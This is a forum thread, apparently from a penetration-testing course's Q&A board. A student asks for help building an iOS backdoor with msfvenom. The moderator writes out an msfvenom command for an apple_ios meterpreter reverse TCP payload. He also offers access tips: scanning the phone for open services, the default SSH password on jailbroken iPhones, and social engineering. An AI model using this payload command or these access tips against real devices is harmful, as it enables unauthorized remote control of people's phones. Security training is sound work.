Viewing 11 posts - 1 through 11 (of 11 total)
  • Author
    Posts
  • #63235
    Saif91
    Participant

    Hey guys,

    I have been try from msfvenom to generate a payload with my public IP for apple_ios and seems doesn’t work or generate, and shows me an error. In the picture that I’ll post you can understand fully what I’ve been doing to generate.

    waiting for your help.

    Attachments:
    You must be logged in to view attached files.
    #63241
    Diego PérezDiego Pérez
    Moderator

    Hi!

    You are combining options that won’t work. If you want to create an iOS malicious app then you can set the architecutre to osx-app nor can select the format as exe, that’s a windows thing only, neither add .exe extension to the name of the file. So I’ll suggest to remove -a anf -f and use a file name without extensions for -o, msfvenom should add the proper values by default.

    Greetings!
    Diego

    #63250
    Saif91
    Participant

    Hey Diego,

    Thanks for responding. I did get it now, so I did what you advise me to do. Delete -e and -f and used the file name without extension. But the output was saying the selected arch(osx-app) is incompatible. so I type msfvenom –list archs and that what I get.

    Best regards,

    • This reply was modified 2 years, 9 months ago by Saif91.
    Attachments:
    You must be logged in to view attached files.
    #63268
    Diego PérezDiego Pérez
    Moderator

    Hi!
    I’ll suggest to read properly what I wrote above, I mentioned to delete -a because using osx-app is incorrect.

    Greetings!
    Diego

    #63269
    Saif91
    Participant

    it doesn’t work man, can you please write the code for me? or give me a example for the same payload!

    #63291
    Diego PérezDiego Pérez
    Moderator

    Hi!
    I have already told what you need to remove, so if you follow what I mentioned you would just run a command like:
    msfvenom -p apple_ios/meterpreter_reverse_tcp LHOST=ip LPORT=port -f myfile

    Why do you say it doesn’t work? What’s the problem? Can you share the last command used, the rsult and explain the problem?
    Also explain what exactly do you expect to get here because msfvenom will not create a malicious .ipa file if that’s what you are trying to do, it will be just a script but in order to run it you would need a jailbroken iphone or ipad.

    Thanks!
    Diego

    • This reply was modified 2 years, 9 months ago by Diego PérezDiego Pérez.
    #63293
    Saif91
    Participant

    alright then.

    • This reply was modified 2 years, 9 months ago by Saif91.
    #63296
    Saif91
    Participant

    Why do you say it doesn’t work? What’s the problem? Can you share the last command used, the rsult and explain the problem?
    Also explain what exactly do you expect to get here because msfvenom will not create a malicious .ipa file if that’s what you are trying to do, it will be just a script but in order to run it you would need a jailbroken iphone or iPad.

    I expect from msfvenom to create payload and make a backdooring with images or link or anything. if that wouldn’t work. how to make a backdooring in iOS or gaining access in iPhone.

    Attachments:
    You must be logged in to view attached files.
    #63334
    Diego PérezDiego Pérez
    Moderator

    Hi!

    For iPhones, the process is harder, because Apple does not let its users to install applications outside the App Store, so what you can do in case of iOS is to try and scan it as shown in the course to check if it has any vulnerable service on open ports using Zenmap or any other vulnerability scanner, though I don’t think that you will get that much from the scan results if the phone wasn’t jailbroken, but it’s worth to try and see. Also, if the iPhone was jailbroken, then the procedure will be a lot easier (Take for example the SSH service running on port 22 with a default password of Alpine). There are other social engineering techniques that can be used to gain access, but they’re not very realistic and it’s not worth even to try them sometimes.

    Greetings!
    Diego

    #63341
    Saif91
    Participant

    Hey Diego,

    thank you for pairing with me. best moderator ever

    Best regards,

    #63356
    Diego PérezDiego Pérez
    Moderator

    You’re welcome!

    Greetings!
    Diego

Viewing 11 posts - 1 through 11 (of 11 total)
  • You must be logged in to reply to this topic.